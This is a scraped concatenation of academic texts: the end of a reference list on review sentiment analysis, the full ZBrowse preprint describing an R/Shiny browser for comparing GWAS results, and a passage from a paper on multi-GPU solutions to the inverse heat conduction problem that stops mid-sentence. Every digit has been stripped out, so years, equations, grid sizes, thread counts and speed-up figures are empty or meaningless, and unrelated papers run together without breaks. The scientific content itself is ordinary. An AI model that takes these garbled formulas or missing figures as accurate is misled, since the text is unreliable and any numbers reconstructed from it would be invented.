zhao l, zhu x. . attention-based lstm for aspect-level sentiment classification. in: proceedings of the conference on empirical methods in natural language processing. – . wang h, lu y, zhai c. . latent aspect rating analysis on review text data: a rating regression approach. in: proceedings of the acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . wang b, xiong s, huang y, li x. . review rating prediction based on user context and product context. applied sciences ( ): doi . /app . xing s, liu f, wang q, zhao x, li t. . a hierarchical attention model for rating prediction by leveraging user and product reviews. neurocomputing : – doi . /j.neucom. . . . ye q, zhang z, law r. . sentiment classification of online reviews to travel destina- tions by supervised machine learning approaches. expert systems with applications ( ): – doi . /j.eswa. . . . zhang q, qu y. . topic-opposite sentiment mining model for online review analysis. journal of frontiers of computer science and technology ( ): – . zhang s, salehan m, leung a, cabral i, aghakhani n. . a recommender system for cultural restaurants based on review factors and review sentiment. in: proceedings of the americas conference on information systems. zhang l, wang s, liu b. . deep learning for sentiment analysis: a survey. wiley interdisciplinary reviews: data mining and knowledge discovery ( ):e . zhao g, qian x, xie x. . user-service rating prediction by exploring social users’ rating behaviors. ieee transactions on multimedia ( ): – doi . /tmm. . . zhou x, wan x, xiao j. . representation learning for aspect category detection in online reviews. in: proceedings of the aaai conference on artificial intelligence. – . jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /app http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /tmm. . http://dx.doi.org/ . /peerj-cs. zbrowse: an interactive gwas results browser a peer-reviewed version of this preprint was published in peerj on may . view the peer-reviewed version (peerj.com/articles/cs- ), which is the preferred citable publication unless you specifically need to cite this preprint. ziegler gr, hartsock rh, baxter i. . zbrowse: an interactive gwas results browser. peerj computer science :e https://doi.org/ . /peerj-cs. https://doi.org/ . /peerj-cs. https://doi.org/ . /peerj-cs. zbrowse: an interactive gwas results browser greg r ziegler, ryan h hartsock, ivan baxter the growing number of genotyped populations, the advent of high-throughput phenotyping techniques and the development of gwas analysis software has rapidly accelerated the number of gwas experimental results. candidate gene discovery from these results files is often tedious, involving many manual steps searching for genes in windows around a significant snp. this problem rapidly becomes more complex when an analyst wishes to compare multiple gwas studies for pleiotropic or environment specific effects. to this end, we have developed a fast and intuitive interactive browser for the viewing of gwas results with a focus on an ability to compare results across multiple traits or experiments. the software can easily be run on a desktop computer with software that bioinformaticians are likely already familiar with. additionally, the software can be hosted or embedded on a server for easy access by anyone with a modern web browser. peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts greg r ziegler  greg.ziegler@ars.usda.gov  united states department of agriculture agricultural research service  st. louis,  missouri,  united states    ryan h hartsock  rhartsock @gmail.com  donald danforth plant science center,  st. louis,  missouri,  united states    ivan baxter  ivan.baxter@ars.usda.gov  united states department of agriculture agricultural research service  st. louis,  missouri,  united states      corresponding author  ivan baxter   n warson rd, st. louis, mo    ( )  ­   ivan.baxter@ars.usda.gov                      peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts mailto:ivan.baxter@ars.usda.gov mailto:ivan.baxter@ars.usda.gov introduction    the recent development of high­throughput plant phenotyping techniques coupled  with the ability to genotype large populations of diverse individuals has revolution­  ized the way that forward genetics research is performed. tools have rapidly become  available to perform genome­wide association studies (gwas) in a variety of  species (kang et al.,  ; segura et al.,  ; lipka et al.,  ) that can map traits to the  genome with high enough resolution to quickly provide a tractable list of potential causal  genes.    one of the first steps an analyst will take is determining what gene or genes fall  under the snp peaks that can be seen on the manhattan plot. unfortunately, these  plots are not interactive and identifying the peaks of interest usually involves sifting through  the results table for the coordinates of the peak of interest and then filtering a large  gene annotation file for a range around the coordinates of the peak. the extra steps  involved in exploring the data in this way makes it more likely that interesting asso­  citations may be missed either due to  ) mistakes made in attempting to mine the large  results files or  ) the dataset not being mined deeply enough due to the difficulty of look­  ing for genes under less significant peaks. additionally, this method quickly  becomes tedious when analyzing multiple phenotypes or relatively complex traits.  some web applications provide tools for viewing manhattan plots interactively, but  they are all either specific to a single species (childs, lisec & walther,  ; li, sham &  wang,  ; seren et al.,  ) or are part of larger software suites that make fast and  straightforward viewing of gwas results difficult (stein et al.,  ). these resources  also do not allow for easy viewing and comparison of gwas results across phenotypes  and studies, a situation that frequently arises with structured populations.    goals    we approached the construction of a new gwas browser with the goal of giving the users the  following tools, all of which were focused on versatility and adaptability:    . ability to plot multiple traits in the same panel.​  we wanted to enable users to find  genotype­environment (gxe) interactions (e.g., those instances where an  environmental condition causes a phenotypic effect, but only for individuals with a    peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts given allele) and loci with pleiotropic effects (the same loci affecting multiple  phenotypes)..  . ability to rapidly move between scales (thousands of bps to billions).    . ability to to find overlaps or commonalities among sets.  . ability to interact directly with the plots​. we wanted the ability to look at the  annotations of genes inline easily and link to additional information.  . ability to download plots and gene lists.  . finally, we wanted all of this information and functionality to be available in one  browser window using tools that are common and freely available to the community.      here, we present an interactive gwas results viewer that is an extension of the classic  gwas manhattan plot. it allows for the rapid comparison of gwas results from multiple  phenotyping experiments and the rapid viewing and analysis of genes under peak snps.  arabidopsis thaliana​, maize, soybean, and sorghum are bundled with the software but we  provide instructions and tools to easily add support for other organisms.    user interface    the zbrowse gwas results viewer is an interactive application that runs on a local machine  using r and is rendered in any modern web browser. because the browser runs on the users  local machine, the data will remain private. the focus of the first version is a local installation,  the browser display allows for easy sharing of the application. the browser is designed to be  a streamlined environment that provides fast access to visualization tools to allow the quick  analysis of gwas results. zbrowse utilizes a tab­based navigation format to make accessing  different aspects of the browser fast, efficient, and intuitive. there is also a sidebar panel on  the left of the page that updates with a set of options specific to the tab being displayed.    the first tab in the list, and the landing page when the application is first loaded,  is the manage tab (figure  ). this tab allows a new gwas dataset to be uploaded  into the application or a pre­loaded dataset from a dropdown menu can be selected.  before uploading, the user selects the appropriate organism from a dropdown menu. data  can be uploaded in a flat file delimited with either commas or tabs or an rdata object.    once uploaded, a preview of the first ten rows of the dataset will appear in the  main panel. below this table is a series of selection boxes that allow the user to specify    peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts which columns in the file to use for plotting. the user needs to select a chromosome  and base pair for determining the location of each snp in the genome. if the uploaded  dataset is data from only one gwas trait, there is a checkbox to include all data as  one trait. otherwise, the user can select one or more trait columns to group the data  by when plotting. for example, a researcher might be interested in comparing  gwas results from multiple experiments, or in comparing results from  multiple traits measured in the same experiment, or both. the user simply needs to select the  column or columns with the label for the trait that the snp corresponds to. finally, the user  needs to select the y­axis column with the significance value against which to plot each snp.  usually, this is the negative logarithm of the p­value, but can also be the number of bootstrap  models that include this snp (rmip, valdar et al.,  ) or any other measure of  trait significance, such as effect size. the final parameter allows for user selectable  values for the y­axis scale. by default, the software will automatically scale the y­axis  based on the range of the selected data.    after the user has selected the appropriate parameters, clicking the submit but­  ton will trigger a tab change to the whole genome view visualization tab (figure  ). conveniently, once submitted, the software will remember the selected settings  for this dataset on future visits and automatically populate the fields with the previ­  ously selected parameters. the plot on this tab is formatted as a standard genome­wide  manhattan plot. the x­axis is ordered by chromosome and base pair within each  chromosome. the background of the plot has alternating blue/white shading for the  even and odd chromosomes to highlight chromosome breaks. the panel  on the left contains a box for each trait column selected in the manage tab. each of  these boxes is populated with the values found in that column and any combination  of one to many traits can be selected for viewing on the plot on the right. there is also  an option for showing only overlapping snps with the ability to adjust both the overlap size  around each point and the minimum number of overlaps.    when the user scrolls over points in the plot, a tooltip will display that shows  information about the trait that snp is associated with, the y­axis value, and the  exact chromosome and base pair for the snp (figure  ). if the tooltip gets in the  way of the viewing or selecting of points, clicking the plot will temporarily hide the  tooltip box. clicking any point in the whole genome view will change tabs to the  chromosome view tab (figure  ). this tab contains two plots: one is a chromosome­wide  view displaying the data from the chromosome clicked in the genome­wide view, the other    peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts plot is an annotation plot of the region around the clicked base pair. a blue band  in the chromosome­wide plot highlights the region being displayed in the annotation  plot.  the plot contains a variety of interactive features. in addition to selecting traits  to view in the sidebar panel, traits can be quickly hidden by clicking their entry  in the legend. when many points are plotted on the same graph, overplotting can  make it difficult to discern points clustered around the same peak. to alleviate this,  the plot can be easily zoomed by clicking and dragging a zoom box anywhere in  the plot. this makes it much easier to see the relationship between tightly grouped  points. the displayed chromosome can be changed without returning to the whole  genome view tab using the drop­down menu in the sidebar panel. points can be clicked to  redraw the annotation plot around new points of interest.    the annotation plot is a variable width plot that defaults to showing the region  ,  base pairs on either side of the point of interest. the width of this region  can be adjusted between  ,  and  ,  base pairs using the slider on the sidebar  panel. the bottom of this plot has a track that shows the position of coding sequences  around the snp of interest. the tooltip for genes in this track displays information  about the gene location, strand, and function, if known. for maize, arabidopsis and  soybean, clicking on the gene will open a new browser tab that links to the gene description  page specific to the organism being viewed. arabidopsis links to the arabidopsis information  resource(tair) (lamesch et al.,  ), soybean links to soybase (grant et al.,  ), and  maize links to the maize genetics and genomics database (maizegdb) (lawrence et al.,  ). in addition, clicking genes in organisms added from phytozome (goodstein et al.,  ) via the add organism application described below opens the phytozome description  page for that gene. zbrowse can be easily modified to link out to other species­specific  databases that can accept a query string in the url.    in addition to the visual browser, annotation data can be explored in tabular form  in the annotation table tab (figure  ). this table provides an interactive table  of the genes found in the window around the selected point. the table is sortable  and searchable and can also be exported as a comma­separated file. a similar table  viewer is available in the data table tab for analysis of the selected gwas dataset.    adding organisms      peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts currently, maize, soybean, arabidopsis and sorghum are downloaded with the browser  source package. we have developed an application to quickly add organisms to the browser  from annotations downloaded from the plant genomics portal (phytozome) to the local  installation of zbrowse. additionally, we will be formatting requested and popular organisms  and releasing the files on github. these will be easy to download and incorporate into your  existing browser installation.    technical foundation    the gwas browser is written in the r programming language using packages  that provide wrappers around popular javascript web applications including shiny (rstudio  inc.,  ) and rcharts (vaidyanathan,  ). because of this, the browser can be run locally  with only r and any modern web browser. internal data processing makes  use of the plyr package (wickham,  ). the javascript plots are drawn using  highcharts (highcharts.com) and are available for use under the creative commons  attribution­noncommercial  .  license. tables are generated using the javascript  library datatables (datatables.net) and xtable (dahl,  ). all of the tools and software used  are either free or open source. the use of r to build the web application makes it more easily  accessible to bioinformaticians to extend than if it was written in pure javascript. many gwas  programs are written in r (kang et al.,  ; segura et al.,  ; lipka et al.,  ). so,  many scientists performing gwas will already have some familiarity with r constructs, even if  they are not computational biologists. this familiarity will hopefully make it easier for the  community who is using the browser to extend it and modify it for their purposes.    limitations    the browser takes a fundamentally different approach from current state of the art  browsers. it is focused on the ability to quickly plot a variety of gwas experiments  on a single manhattan plot. a caveat to this ability, however, is that it cannot plot  every snp in a genotype dataset. due to memory, time, and plotting constraints  the current browser is limited to approximately   data points per trait, which  is significantly less than most genotype datasets. of course, only the most strongly  associated snps are typically of interest, so this problem can be easily mitigated  by trimming the input file to contain only significant associations (e.g., p< . ).  future improvements to the browser could support the plotting of more information  by binning points when zoomed out to a point where over plotting is an issue and    peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts only loading individual data points asynchronously when the zoom level is sufficient  to see individual points.    the generality of the browser allows for it to be used with any snp dataset.  only chromosome number and base pair information needs to be provided for each  snp. however, this means that specific information about the genotype dataset being  used, such as minor allele frequency or linkage disequilibrium information, cannot be  displayed on the plot. of course, the flexibility of the browser would make it easy  to build personalized solutions that could display additional information for specific  snp datasets and additional tracks could be added to display linkage disequilibrium  decay around the selected snp.    one obvious extension of the browser that would address many of the limitations listed above  would be to connect it to a database designed to quickly and efficiently handle all of the data  that goes into a gwas experiment. database support would allow custom subsetting of entire  gwas datasets and if the gwas genotype files are available, then summary data about each  particular snp could also be displayed. this would allow the browser to be incorporated into a  much larger ecosystem that could take a gwas experiment from phenotypic dataset, through  running a gwas experiment, to final analysis and visualization.    while the limitations identified above may constrain the use of the browser for certain  applications, there are a number of use cases that are enabled by its current functionality.  using open source tools  and github for the code distribution, the browser functionalities can  be enhanced by the authors or by other members of the user community.      available resources:  download at:  http://www.baxterlab.org/#!/cqi   code is also available on github at  https://github.com/baxterlabzbrowse/zbrowse  manual can be found here:  http://media.wix.com/ugd/ a_ a d deb bd da b c c de ca.pdf  for support email:  baxterlabzbrowse@danforthcenter.org      peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts references    childs lh, lisec j, walther d.  . matapax: an online high­throughput genome­wide  association study pipeline.​ plant physiology​  : – .  dahl db.  .​ xtable: export tables to latex or html​.  goodstein dm, shu s, howson r, neupane r, hayes rd, fazo j, mitros t, dirks w, hellsten  u, putnam n, rokhsar ds.  . phytozome: a comparative platform for green plant  genomics.​ nucleic acids research​  :d –d .  grant d, nelson rt, cannon sb, shoemaker rc.  . soybase, the usda­ars soybean  genetics and genomics database.​ nucleic acids research​  :d –d .  kang hm, zaitlen na, wade cm, kirby a, heckerman d, daly mj, eskin e.  . efficient  control of population structure in model organism association mapping.​ genetics  : – .  kang hm, sul jh, service sk, zaitlen na, kong s, freimer nb, sabatti c, eskin e.  .  variance component model to account for sample structure in genome­wide  association studies.​ nature genetics​  : – .  lamesch p, berardini tz, li d, swarbreck d, wilks c, sasidharan r, muller r, dreher k,  alexander dl, garcia­hernandez m, karthikeyan as, lee ch, nelson wd, ploetz l,  singh s, wensel a, huala e.  . the arabidopsis information resource (tair):  improved gene annotation and new tools.​ nucleic acids research​  :d –d .  lawrence cj, dong q, polacco ml, seigfried te, brendel v.  . maizegdb, the  community database for maize genetics and genomics.​ nucleic acids research  :d –d .    peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts lipka ae, tian f, wang q, peiffer j, li m, bradbury pj, gore ma, buckler es, zhang z.  . gapit: genome association and prediction integrated tool.​ bioinformatics  : – .  li mj, sham pc, wang j.  . genetic variant representation, annotation and prioritization  in the post­gwas era.​ cell research​  : – .  rstudio inc.  .​ shiny: web application framework for r​.  segura v, vilhjálmsson bj, platt a, korte a, seren Ü, long q, nordborg m.  . an efficient  multi­locus mixed­model approach for genome­wide association studies in structured  populations.​ nature genetics​  : – .  seren Ü, vilhjálmsson bj, horton mw, meng d, forai p, huang ys, long q, segura v,  nordborg m.  . gwapp: a web application for genome­wide association  mapping in arabidopsis.​ the plant cell online​:tpc. . .  stein ld, mungall c, shu s, caudy m, mangone m, day a, nickerson e, stajich je, harris  tw, arva a, lewis s.  . the generic genome browser: a building block for a  model organism system database.​ genome research​  : – .  vaidyanathan r.  .​ rcharts: interactive charts using polycharts.js​.  valdar w, holmes cc, mott r, flint j.  . mapping in structured populations by resample  model averaging.​ genetics​  : – .  wickham h.  . the split­apply­combine strategy for data analysis.​ journal of statistical  software​  : – .                    peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts         fig.  . landing page for interactive gwas results browser.                                                peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts       fig.  . genome wide view of interactive gwas results browser. the legend at the bottom of  the figure displays the color of points that correspond to the combination of traits and  locations selected in the sidebar on the left hand side of the figure. clicking the points in the  legend allows a user to easily show or hide points from that trait. modincprob=random model  inclusion probability, rmip, the fraction of times each snp displayed was returned out of    gwas analyses performed on a random subset of  % of the data. the title of the plot is  automatically generated from the filename of the dataset provided by the user. this makes it  easy to determine which gwas experiment is being plotted. base pairs = base position along  the chromosome.                                              peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts   fig.  . example of tooltip displaying top snp for trait   in a maize nam gwas experiment.  the legend at the bottom of the figure displays the color of points that correspond to the  combination of traits and locations selected in the sidebar on the left hand side of the figure.  clicking the points in the legend allows easily show or hide points from that trait.  modincprob=random model inclusion probability, rmip, the fraction of times each snp  displayed was returned out of   gwas analyses performed on a random subset of  % of  the data. the title of the plot is automatically generated from the filename of the file provided  by the user. this makes it easy to determine which gwas experiment is being plotted.                                                        peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts     fig.  . chromosome view tab of the interactive gwas results browser displaying a peak  above the ion transporter. the legend at the bottom of the figure displays the color of points  that correspond to the combination of traits and locations selected in the sidebar on the left  hand side of the figure. clicking the points in the legend allows a user to easily show or hide  points from that trait. modincprob=random model inclusion probability, rmip, the fraction of  times each snp displayed was returned out of   gwas analyses performed on a random  subset of  % of the data. the title of the plot is automatically generated from the filename of  the dataset provided by the user. this makes it easy to determine which gwas experiment is  being plotted. base pairs = base position along the chromosome.                                    peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts   fig.  . annotation tab of the interactive gwas results browser.    peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts submitted may accepted october published november corresponding author sándor szénási, szenasi.sandor@nik.uni-obuda.hu academic editor miriam leeser additional information and declarations can be found on page doi . /peerj-cs. copyright szénási distributed under creative commons cc-by . open access solving the inverse heat conduction problem using nvlink capable power architecture sándor szénási john von neumann faculty of informatics, Óbuda university, budapest, hungary abstract the accurate knowledge of heat transfer coefficients is essential for the design of precise heat transfer operations. the determination of these values requires inverse heat transfer calculations, which are usually based on heuristic optimisation techniques, like genetic algorithms or particle swarm optimisation. the main bottleneck of these heuristics is the high computational demand of the cost function calculation, which is usually based on heat transfer simulations producing the thermal history of the workpiece at given locations. this direct heat transfer calculation is a well parallelisable process, making it feasible to implement an efficient gpu kernel for this purpose. this paper presents a novel step forward: based on the special requirements of the heuristics solving the inverse problem (executing hundreds of simulations in a parallel fashion at the end of each iteration), it is possible to gain a higher level of parallelism using multiple graphics accelerators. the results show that this implementation (running on gpus) is about times faster than a traditional cpu implementation using cores. the latest developments of the gpu-based high power computations area were also analysed, like the new nvlink connection between the host and the devices, which tries to solve the long time existing data transfer handicap of gpu programming. subjects distributed and parallel computing, graphics, scientific computing and simulation, software engineering keywords gpu, cuda, inverse heat conduction problem, heat transfer, parallelisation, data- parallel algorithm, simulation, nvlink, graphics accelerator, optimisation introduction as a fundamental experience of modern materials science, material properties are influenced by the microstructure; therefore, these can be altered to improve the mechanical attributes (oksman et al., ). one of the most widely used methods for this purpose is heat treatment which usually consists of two consecutive steps: heating up the work object to a given high temperature and cooling it down in a precisely controlled environment. it is necessary to know the attributes of the given material and the environment, to achieve the best results, especially the heat transfer coefficient (htc) which shows the amount of heat exchanged between the object and the surrounding cooling medium. the inverse heat conduction problem (ihcp—the determination of the htc) is a typical ill-posed problem (beck, blackwell & clair st, ; alifanov, ; felde, b). without any known analytical solution, most methods are based on the comparison how to cite this article szénási ( ), solving the inverse heat conduction problem using nvlink capable power architecture. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:szenasi.sandor@nik.uni-obuda.hu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. of temperature signals recorded during real heat treatment processes and estimated by simulations. the aim of these methods is to find the htc function giving the minimal deviation of the measured and predicted temperature data. it is usual to use heuristic algorithms, like genetic algorithms (gas) (szénási & felde, ), particle swarm optimisation (pso) (felde & szénási, ; szénási & felde, ) or some hybrid approaches (felde, a) to find this parameter. kim & baek ( ) presented a hybrid genetic algorithm for the analysis of inverse surface radiation in an axisymmetric cylindrical enclosure. verma & balaji ( ) used a stochastic particle swarm optimization to estimate several parameters in the field of inverse conduction-radiation. both papers have significant contribution in the field of inverse methods. in the case of gas, every chromosome of the population encodes one possible htc function in its genes. these are two-dimensional continuous functions given by the time and location. therefore, a limited number of control points have been used to approximate these ( floating point values per htc). with the already existing direct heat conduction problem (dhcp) solver methods (based on finite-elements or finite-difference techniques), it is feasible to simulate the cooling process and to record the thermal history for each chromosome. the difference between this generated thermal history and the measured one produces the cost value for the individual. the purpose of the ihcp process is to find the best gene values resulting in minimal cost. the bottleneck of this process is the high computational demand. the runtime of one cooling process simulation is about ms using one traditional cpu core, and it is necessary to run these simulations for each chromosome in each iteration. assuming a population of , chromosomes and a ga with , iterations, it takes several days to finish the search. furthermore, according to the random behaviour of the ga and the enormously large search space, it is worth running multiple searches. as a result, an overall ihcp process can take many weeks. there are several attempts at using graphics accelerators to speed up physical simulations, and there are several substantial achievements in this field too. satake, yoshimori & suzuki ( ) presented a related method to solve heat conduction equations using the cuda fortran language. they worked out a very well optimised method (analysing the ptx code generated by the compiler), but they only dealt with the one-dimensional unsteady heat conduction equation for temperature distribution. klimeš & Štětina ( ) presented another model using the finite difference method to simulate the three-dimensional heat transfer. their results showed that the gpu implementation is – times faster than the same cpu-based simulation using one tesla c gpu for running kernels. this significant speed up makes it possible to use their method in a real-time fashion. narang, wu & shakur ( ) and narang, wu & shakur ( ) also used programmable graphics hardware to speed up the heat transfer calculations based on a similar finite difference method. they used a quadro fx card, and the speed up was still significant (about × in the case of a large number of nodes). there are also several papers from similar areas. humphrey et al. ( ) and he et al. ( ) have very significant contributions to the field of radiative heat transfer problems. these also show that it is worth implementing gpu codes for physical simulations. szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the main difference between these studies and this research is that this paper is focusing on the two-dimensional ihcp. heat transfer simulation is a major part of the ihcp solving process; moreover, it is necessary to run thousands of simulations. accordingly, it is feasible to use a higher level of parallelism by using multi-gpu architectures (the presented papers are usually deal with only one device). it is possible to install multiple graphics cards into a standard pc motherboard, and the cuda programming environment can handle all of them. using multiple gpus can double/triple/quadruple the processing power, but it is necessary to adapt the algorithms to this higher level of parallelism. one of the most interesting developments of in htc computing is the result of the ibm and nvidia collaboration, the nvlink high-speed interface between ibm’s power cpus and nvidia’s pascal gpus. data transfer between the host and device memory was an important bottleneck in gpu programming, making several promising applications practically unusable. this high-speed connection and the existence of multiple pascal based graphics cards give developers the ability to accelerate applications more easily. the assumption was that it is worth implementing an ihcp solver system based on this architecture. based on these advancements, a novel numerical approach and a massively parallel implementation to estimate the theoretical thermal history are outlined. the rest of the paper is structured as follows: the next section presents the novel parallel dhcp and ihcp solver methods; ‘results and discussion’ presents the raw results of the benchmarks and the detailed analysis; finally, the last section contains the conclusions and further plans. materials & methods direct heat conduction problem there are various fundamental modes of heat transfer, but this paper deals only with transient conduction when the temperature of the workpiece changes as a function of time. the determination of the temperature of any points of the object at any moment often calls for some computer-assisted approximation methods. in the case of three-dimensional objects, these calculations can be very complicated and resource intensive, preventing the efficient usage as a ga cost function. for cylindrical objects, an essential simplification can significantly decrease the computational effort. as can be seen in fig. it is enough to model the middle cross-section of the cylinder, resulting in the two-dimensional axis-symmetrical heat conduction model. the radius of the cylinder is noted by r and z. the cylinder is subjected to a longitudinal local coordinate and time varying heat transfer coefficient htc(z,t) on all its surfaces. both the thermal conductivity, density and the heat capacity are varying with the temperature, k(t), ρ(t) and cp(t). it has to be noted that phase transformations of the materials applied do not occur during the experiments, therefore latent heat generation induced by phase transformations is not considered. based on this simplified model, the mathematical formulation of the nonlinear transient heat conduction can be described as eq. ( ), with the following initial and boundary szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. top bottom in s id e s u rf a c e z= z=z r=r r= figure two-dimensional axis-symmetrical heat conduction model. full-size doi: . /peerjcs. /fig- conditions eqs. ( )–( ): ∂ ∂r (k ∂t ∂r )+ k r ∂t ∂r + ∂ ∂z (k ∂t ∂z )+qv =ρcp ∂t ∂t ( ) t(r = ,z,t = )=t , ( ) k ∂t ∂z | ≤z≤l,r=r=htc(z,t)[tq−t(r =r,z,t)], ( ) k ∂t ∂z |z= , ≤r<r=htc(z = ,t)[tq−t(r,z = ,t)], ( ) k ∂t ∂z |z=z, ≤r<r=htc(z =z,t)[tq−t(r,z =z,t)], ( ) where • r,z—local coordinates; • t—time; • r—radius of the workpiece; • ρ(t)—density of the object; • t —initial temperature of the workpiece; • tq—temperature of the cooling medium; • t(r,z,t)—temperature of the workpiece at given location/time; • k(t)—thermal conductivity (varying with temperature); szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. • cp(t)—heat capacity (varying with temperature); • htc(z,t)—heat conduction (varying with local coordinate and time). discretising of these equations using the weighted schmidt explicit finite difference method, results in nine different equations, according to the location within the object. • case (a)—inner items surrounded by four neighbouring items; • case (b)—inner items at the centre line of the object; • case (c)—boundary items at the outer surface of the object; • case (d)—boundary items at the top surface of the object; • case (e)—boundary items at the bottom surface of the object; • case (f)—boundary item at the outer top corner; • case (g)—boundary item at the inner top corner; • case (h)—boundary item at the outer bottom corner; • case (i)—boundary item at the inner bottom corner. the reliability of the estimated htc strongly depends on the numerical approach applied. during the dhcp calculations, the resolution of the finite grid is essential, parameters n= , m= were used, where n is the number of points horizontally, and m is the number of points vertically. a sufficiently small dt (simulation time interval) value is also necessary to ensure the accuracy of the method (dt = . second). massively parallel solution it is necessary to solve the heat transfer equations for each finite item for the consequent time periods. equations for calculating the heat movement between neighbouring items within the same time can be solved in a parallel fashion because none of these calculations modifies the output of the others. moreover, for several items, the steps of these calculations are the same, only the input parameters are different. this makes it possible to implement an efficient data-parallel algorithm. assuming n×m number of threads, the parallelization level is: • (n− )×(m− ) threads have to calculate case a; • (m− ) threads have to calculate case b; • (m− ) threads have to calculate case c; • (n− ) threads have to calculate case d; • (n− ) threads have to calculate case e; • + + + threads have to calculate case f, g, h and i. based on this data parallel fashion, it is worth implementing a gpu-based implementation. every gpu thread is responsible for one item in the finite grid. the task of these threads is the determination of the temperature in the corresponding location in each consecutive time step. these threads can work in parallel with the equations of the same time step. nevertheless, these are not totally independent, because as an input parameter, threads need the temperature of the neighbouring elements at the previous time step. the threads have to wait until all the others have finished the calculations for the actual period to fulfil this before they can continue working on the next time step. szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. this needs an explicit synchronisation after every time step, and in the cuda framework, the only efficient barrier synchronisation is given by the __syncthreads() function, which synchronises the threads within the same block. according to this, it is necessary to keep all threads working on the same finite grid in the same cuda block. there is an upper limit for the number of threads within a block ( , for current architectures); but, in the case of ordinary configuration, this is not a limiting factor ( · = threads were used). running threads is not sufficient to fully utilise a modern gpu. one p accelerator card has , cuda cores. therefore, this low number of threads leads only a low theoretical occupancy level (number of used cores/number of available cores = / , = . %), and the practical utilisation is expected to be even worse (not to mention, that one server node has four cards installed). at this point, recall that this dhcp calculation is responsible for the cost calculation part of a genetic algorithm. a population containing p chromosomes needs p number of thermal history generations in the evaluation phase of the ga. these are independent calculations, so it is feasible to launch these in a parallel fashion using more than one multi-processors. given this higher level of parallelism, the required number of threads becomes p× , which is enough to utilise the computing power of the graphics accelerators fully. this observation is the key point for the multi-gpu implementation. the already mentioned independence makes it possible to distribute these fitness calculations among the available devices. in the case of g number of gpus, it is worth to assign each chromosome to one of the gpus using eq. ( ), which shows the number of assigned chromosomes (pi) for the ith gpu (where ≤ i≤g). pi=   p−(g− ) ⌊ p g ⌋ , if i= ⌊ p g ⌋ , otherwise ( ) further optimisation using shared memory gpu applications can easily be limited by memory bandwidth issues. data starvation occurs when all threads of a block must wait for loading or storing the actual temperature value of the corresponding finite item. taking the advantages of the heterogeneous memory hierarchy makes it feasible to decrease this adverse effect. chromosome data (the htc functions) and the fitness values must be in the device memory of the gpu because these must be transferred from and to the host. however, during the thermal history generation, it is better to store the actual temperature data of the finite grid in the fast on-chip shared memory. all threads of the block can read and modify these values. therefore, these can read the actual temperature values of the neighbouring elements. the adverse effect of heavy shared memory usage is the limit for the number of parallel block executions. the p architecture has kb of shared memory per multiprocessors. float variables are necessary to store the actual values of the grid, requesting only , bytes of shared memory by simulations. according to this, even blocks can run in parallel szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. g d d d d d d d d f b a a a a a a a a c b a a a a a a a a c b a figure heavy warp divergence at the top of the workpiece. letters show the locations linked to threads in the first warp. different letters represent different code paths. full-size doi: . /peerjcs. /fig- in one multiprocessor. other constraints (maximum number of resident warps/threads by multiprocessor) have much stronger limits, and thus shared memory usage does not cause any disadvantage. the implementation of this on-chip memory usage gives about – × speed-up for the gpu implementation (based on other parameters, like population size, grid size, full simulation time). warp divergence when a thread block is assigned to a multiprocessor, it is divided into further groups of threads called warps. this partitioning is predetermined: threads with index – will be the first warp, threads in the – index range the second warp, and so on nvidia ( ). the warp is the lowest unit of execution scheduling, at any time, one instruction is fetched and executed by all threads within the same warp. the operands of these instructions can be different; therefore, in the case of conditional statements, different threads in the same warp should take different paths. the solution for this warp divergence is that all threads within a warp must take both branches of the conditional statement; threads with false condition are stalling, while the others are executing the instructions of the true branch, and threads with true condition are stalling, while the others are executing the false branch. these stall phases can significantly decrease the occupancy; hence, warp divergence should be avoided to obtain the best performance. in the case of dhcp calculations, the number of threads is equal to the size of the finite grid (n×m). every thread corresponds to the calculations of one item in the grid, and the first intuition shows that thread indices should be the same as the indices of the corre- sponding finite item. however, this leads to heavy warp divergence; for example, threads of the first warp (identified by indices below) should execute the following code paths (fig. ): • ( , ) thread have to calculate case g; • ( , ) thread have to calculate case f; • ( , )–( , ) threads have to 